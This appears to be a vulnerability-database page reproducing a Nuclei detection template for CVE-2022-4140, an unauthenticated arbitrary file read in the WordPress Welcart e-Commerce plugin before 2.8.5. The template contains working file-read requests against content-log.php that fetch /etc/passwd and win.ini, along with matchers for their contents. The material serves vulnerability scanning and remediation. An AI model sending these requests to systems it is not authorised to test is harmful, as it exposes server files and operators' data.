Lucene search
K

WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

WordPress Welcart plugin <2.8.5 - Arbitrary File Access & fi

Related
Refs
Code
id: CVE-2022-4140

info:
  name: WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access
  author: theamanrawat
  severity: high
  description: |
    WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can access sensitive files on the server, potentially exposing sensitive information.
  remediation: Fixed in version 2.8.5.
  reference:
    - https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7
    - https://wordpress.org/plugins/usc-e-shop/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4140
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-4140
    cwe-id: CWE-552
    epss-score: 0.02941
    epss-percentile: 0.85395
    cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: collne
    product: welcart_e-commerce
    framework: wordpress
  tags: cve,cve2022,usc-e-shop,wpscan,wp-plugin,wp,wordpress,lfi,unauthenticated,collne,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd"
      - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210089ee93df3cb2689f17956bec8f49b750695c61d17b86ea458f8698885c25d602022100f717f22cdc59913dd2734f6335e1468519f84b5661ccb006b3e06a304b33f630:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.17.5
EPSS0.02941
SSVC
23